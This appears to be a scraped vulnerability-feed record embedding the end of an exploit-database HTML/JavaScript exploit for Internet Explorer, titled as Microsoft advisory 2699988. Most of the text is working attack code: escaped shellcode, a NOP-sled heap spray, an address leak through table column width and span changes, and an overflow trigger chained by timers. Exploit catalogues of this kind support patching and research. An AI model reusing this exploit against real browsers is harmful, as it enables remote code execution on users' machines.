\"%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff\" +\n \"%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789\" +\n \"%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389\" +\n \"%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7\" +\n \"%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650\" +\n \"%u5656%u5646%u564e%u5356%u6856%ucc79%u863f\" +\n \"%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d\" +\n \"%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff\" +\n \"%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72\" +\n \"%u006a%uff53%u41d5\");\n\n // Total spray should be 1000\n var padding = unescape(\"%u9090\");\n while (padding.length < 1000)\n padding = padding + padding;\n var padding = padding.substr(0, 1000 - shellcode.length);\n\n shellcode+= padding;\n\n while (shellcode.length < 100000)\n shellcode = shellcode + shellcode;\n\n var onemeg = shellcode.substr(0, 64*1024/2);\n\n for (i=0; i<14; i++) {\n onemeg += shellcode.substr(0, 64*1024/2);\n }\n\n onemeg += shellcode.substr(0, (64*1024/2)-(38/2));\n\n var spray = new Array();\n\n for (i=0; i<100; i++) {\n spray[i] = onemeg.substr(0, onemeg.length);\n }\n}\n\nfunction leak(){\n var leak_col = document.getElementById(\"132\");\n leak_col.width = \"41\";\n leak_col.span = \"19\";\n}\n\nfunction get_leak() {\n var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));\n str_addr = str_addr - 1410704;\n var hex = str_addr.toString(16);\n //alert(hex);\n setTimeout(function(){heapspray(str_addr)}, 50);\n}\n\nfunction trigger_overflow(){\n var evil_col = document.getElementById(\"132\");\n evil_col.width = \"1245880\";\n evil_col.span = \"44\";\n}\n\nsetTimeout(function(){leak()}, 400);\nsetTimeout(function(){get_leak()},450);\nsetTimeout(function(){trigger_overflow()}, 700);\n\n</script>\n</body>\n</html>", "sourceHref": "https://gitlab.com/exploit-database/exploitdb/-/raw/main/exploits/windows/remote/34815.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}

Microsoft Internet Explorer Multiple Vulnerabilities (2699988)

Description

Related